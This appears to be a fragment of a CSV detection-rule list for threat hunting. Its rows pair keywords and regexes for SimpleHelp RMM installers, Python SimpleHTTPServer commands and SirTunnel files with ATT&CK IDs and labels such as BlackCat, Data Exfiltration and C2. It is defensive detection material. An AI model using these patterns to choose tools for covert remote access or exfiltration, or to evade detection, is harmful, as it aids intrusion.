TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote Access-linux32-online.tar*",".{0,1000}Remote\sAccess\-linux32\-online\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote 
Access-linux64arm-offline.tar*",".{0,1000}Remote\sAccess\-linux64arm\-offline\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote Access-linux64arm-online.tar*",".{0,1000}Remote\sAccess\-linux64arm\-online\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote Access-linux64-offline.tar*",".{0,1000}Remote\sAccess\-linux64\-offline\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote Access-linux64-online.tar*",".{0,1000}Remote\sAccess\-linux64\-online\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote Access-macos-intel-offline.dmg*",".{0,1000}Remote\sAccess\-macos\-intel\-offline\.dmg.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote 
Access-macos-intel-online.dmg*",".{0,1000}Remote\sAccess\-macos\-intel\-online\.dmg.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote Access-macos-offline.dmg*",".{0,1000}Remote\sAccess\-macos\-offline\.dmg.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote Access-macos-online.dmg*",".{0,1000}Remote\sAccess\-macos\-online\.dmg.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote Access-windows32-offline.exe*",".{0,1000}Remote\sAccess\-windows32\-offline\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote Access-windows32-online.exe*",".{0,1000}Remote\sAccess\-windows32\-online\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote 
Access-windows64-offline.exe*",".{0,1000}Remote\sAccess\-windows64\-offline\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*remote access-windows64-online.exe*",".{0,1000}remote\saccess\-windows64\-online\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote Access-windows64-online.exe*",".{0,1000}Remote\sAccess\-windows64\-online\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote Support-java-online.jar*",".{0,1000}Remote\sSupport\-java\-online\.jar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote Support-linux32arm-offline.tar*",".{0,1000}Remote\sSupport\-linux32arm\-offline\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote 
Support-linux32arm-online.tar*",".{0,1000}Remote\sSupport\-linux32arm\-online\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote Support-linux32-offline.tar*",".{0,1000}Remote\sSupport\-linux32\-offline\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote Support-linux32-online.tar*",".{0,1000}Remote\sSupport\-linux32\-online\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote Support-linux64arm-offline.tar*",".{0,1000}Remote\sSupport\-linux64arm\-offline\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote Support-linux64arm-online.tar*",".{0,1000}Remote\sSupport\-linux64arm\-online\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote 
Support-linux64-offline.tar*",".{0,1000}Remote\sSupport\-linux64\-offline\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote Support-linux64-online.tar*",".{0,1000}Remote\sSupport\-linux64\-online\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote Support-macos-intel-offline.dmg*",".{0,1000}Remote\sSupport\-macos\-intel\-offline\.dmg.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote Support-macos-intel-online.dmg*",".{0,1000}Remote\sSupport\-macos\-intel\-online\.dmg.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote Support-macos-offline.dmg*",".{0,1000}Remote\sSupport\-macos\-offline\.dmg.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote 
Support-macos-online.dmg*",".{0,1000}Remote\sSupport\-macos\-online\.dmg.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote Support-windows32-offline.exe*",".{0,1000}Remote\sSupport\-windows32\-offline\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote Support-windows32-online.exe*",".{0,1000}Remote\sSupport\-windows32\-online\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote Support-windows64-offline.exe*",".{0,1000}Remote\sSupport\-windows64\-offline\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*remote support-windows64-online.exe*",".{0,1000}remote\ssupport\-windows64\-online\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote 
Support-windows64-online.exe*",".{0,1000}Remote\sSupport\-windows64\-online\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*remote work-windows64-online.exe*",".{0,1000}remote\swork\-windows64\-online\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote Work-windows64-online.exe*",".{0,1000}Remote\sWork\-windows64\-online\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SimpleHelp - simple-help.com*",".{0,1000}SimpleHelp\s\-\ssimple\-help\.com.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*simplehelp remote work.exe*",".{0,1000}simplehelp\sremote\swork\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*simplehelp remote 
workwinlauncher.exe*",".{0,1000}simplehelp\sremote\sworkwinlauncher\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SimpleHelp Remote WorkWinLauncher.exe*",".{0,1000}SimpleHelp\sRemote\sWorkWinLauncher\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SimpleHelp Technician.exe*",".{0,1000}SimpleHelp\sTechnician\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*simplehelp technician.exe*",".{0,1000}simplehelp\stechnician\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SimpleHelp Technician-java-online.jar*",".{0,1000}SimpleHelp\sTechnician\-java\-online\.jar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SimpleHelp 
Technician-linux32arm-offline.tar*",".{0,1000}SimpleHelp\sTechnician\-linux32arm\-offline\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SimpleHelp Technician-linux32arm-online.tar*",".{0,1000}SimpleHelp\sTechnician\-linux32arm\-online\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SimpleHelp Technician-linux32-offline.tar*",".{0,1000}SimpleHelp\sTechnician\-linux32\-offline\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SimpleHelp Technician-linux32-online.tar*",".{0,1000}SimpleHelp\sTechnician\-linux32\-online\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SimpleHelp Technician-linux64arm-offline.tar*",".{0,1000}SimpleHelp\sTechnician\-linux64arm\-offline\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SimpleHelp 
Technician-linux64arm-online.tar*",".{0,1000}SimpleHelp\sTechnician\-linux64arm\-online\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SimpleHelp Technician-linux64-offline.tar*",".{0,1000}SimpleHelp\sTechnician\-linux64\-offline\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SimpleHelp Technician-linux64-online.tar*",".{0,1000}SimpleHelp\sTechnician\-linux64\-online\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SimpleHelp Technician-macos-intel-offline.dmg*",".{0,1000}SimpleHelp\sTechnician\-macos\-intel\-offline\.dmg.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SimpleHelp Technician-macos-intel-online.dmg*",".{0,1000}SimpleHelp\sTechnician\-macos\-intel\-online\.dmg.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SimpleHelp 
Technician-macos-offline.dmg*",".{0,1000}SimpleHelp\sTechnician\-macos\-offline\.dmg.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SimpleHelp Technician-macos-online.dmg*",".{0,1000}SimpleHelp\sTechnician\-macos\-online\.dmg.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SimpleHelp Technician-windows32-offline.exe*",".{0,1000}SimpleHelp\sTechnician\-windows32\-offline\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SimpleHelp Technician-windows32-online.exe*",".{0,1000}SimpleHelp\sTechnician\-windows32\-online\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SimpleHelp Technician-windows64-offline.exe*",".{0,1000}SimpleHelp\sTechnician\-windows64\-offline\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*simplehelp 
technician-windows64-online.exe*",".{0,1000}simplehelp\stechnician\-windows64\-online\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SimpleHelp Technician-windows64-online.exe*",".{0,1000}SimpleHelp\sTechnician\-windows64\-online\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*simplehelp technicianwinlauncher.exe*",".{0,1000}simplehelp\stechnicianwinlauncher\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SimpleHelp.exe*",".{0,1000}SimpleHelp\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*simplehelp.technician.127_0_0_1*",".{0,1000}simplehelp\.technician\.127_0_0_1.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" 
"*SimpleHelp-allplatforms.zip*",".{0,1000}SimpleHelp\-allplatforms\.zip.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*simplehelpcustomer.exe*",".{0,1000}simplehelpcustomer\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SimpleHelp-install-64.exe*",".{0,1000}SimpleHelp\-install\-64\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* -m SimpleHTTPServer *",".{0,1000}\s\-m\sSimpleHTTPServer\s.{0,1000}","greyware_tool_keyword","simplehttpserver","quick web server in python","T1021.002 - T1059.006","TA0002 - TA0005","N/A","N/A","Data Exfiltration","https://docs.python.org/2/library/simplehttpserver.html","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*import SimpleHTTPServer*",".{0,1000}import\sSimpleHTTPServer.{0,1000}","greyware_tool_keyword","simplehttpserver","quick web server in python","T1021.002 - T1059.006","TA0002 - TA0005","N/A","N/A","Data Exfiltration","https://docs.python.org/2/library/simplehttpserver.html","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*python -m SimpleHTTPServer*",".{0,1000}python\s\-m\sSimpleHTTPServer.{0,1000}","greyware_tool_keyword","simplehttpserver","quick web server in python","T1021.002 - T1059.006","TA0002 - TA0005","N/A","N/A","Data 
Exfiltration","https://docs.python.org/2/library/simplehttpserver.html","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*SimpleHTTPServer.SimpleHTTPRequestHandler*",".{0,1000}SimpleHTTPServer\.SimpleHTTPRequestHandler.{0,1000}","greyware_tool_keyword","simplehttpserver","quick web server in python","T1021.002 - T1059.006","TA0002 - TA0005","N/A","N/A","Data Exfiltration","https://docs.python.org/2/library/simplehttpserver.html","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "* $domain sirtunnel $domain $serverPort*",".{0,1000}\s\$domain\ssirtunnel\s\$domain\s\$serverPort.{0,1000}","greyware_tool_keyword","SirTunnel","SirTunnel enables you to securely expose a webserver running on your computer to a public URL using HTTPS.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/anderspitman/SirTunnel","1","0","N/A","N/A","10","10","1327","111","2024-03-24T20:15:50Z","2020-09-23T00:15:26Z" "* sirtunnel.py*",".{0,1000}\ssirtunnel\.py.{0,1000}","greyware_tool_keyword","SirTunnel","SirTunnel enables you to securely expose a webserver running on your computer to a public URL using HTTPS.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/anderspitman/SirTunnel","1","0","N/A","N/A","10","10","1327","111","2024-03-24T20:15:50Z","2020-09-23T00:15:26Z" "*/config/apps/http/servers/sirtunnel/routes*",".{0,1000}\/config\/apps\/http\/servers\/sirtunnel\/routes.{0,1000}","greyware_tool_keyword","SirTunnel","SirTunnel enables you to securely expose a webserver running on your computer to a public URL using HTTPS.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/anderspitman/SirTunnel","1","1","N/A","N/A","10","10","1327","111","2024-03-24T20:15:50Z","2020-09-23T00:15:26Z" "*/SirTunnel.git*",".{0,1000}\/SirTunnel\.git.{0,1000}","greyware_tool_keyword","SirTunnel","SirTunnel enables you to securely expose a webserver running on your computer to a public URL using HTTPS.","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/anderspitman/SirTunnel","1","1","N/A","N/A","10","10","1327","111","2024-03-24T20:15:50Z","2020-09-23T00:15:26Z" "*/sirtunnel.py*",".{0,1000}\/sirtunnel\.py.{0,1000}","greyware_tool_keyword","SirTunnel","SirTunnel enables you to securely expose a webserver running on your computer to a public URL using HTTPS.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/anderspitman/SirTunnel","1","1","N/A","N/A","10","10","1327","111","2024-03-24T20:15:50Z","2020-09-23T00:15:26Z" "*\sirtunnel.py*",".{0,1000}\\sirtunnel\.py.{0,1000}","greyware_tool_keyword","SirTunnel","SirTunnel enables you to securely expose a webserver running on your computer to a public URL using HTTPS.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/anderspitman/SirTunnel","1","0","N/A","N/A","10","10","1327","111","2024-03-24T20:15:50Z","2020-09-23T00:15:26Z" "*anderspitman/SirTunnel*",".{0,1000}anderspitman\/SirTunnel.{0,1000}","greyware_tool_keyword","SirTunnel","SirTunnel enables you to securely expose a webserver running on your computer to a public URL using HTTPS.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/anderspitman/SirTunnel","1","1","N/A","N/A","10","10","1327","111","2024-03-24T20:15:50Z","2020-09-23T00:15:26Z" "*d5687d84d518119cbdd84183bfe8cb29009d054794b3aed5bda7ad117a7e4d5e*",".{0,1000}d5687d84d518119cbdd84183bfe8cb29009d054794b3aed5bda7ad117a7e4d5e.{0,1000}","greyware_tool_keyword","SirTunnel","SirTunnel enables you to securely expose a webserver running on your computer to a public URL using HTTPS.","T1572","TA0011 - 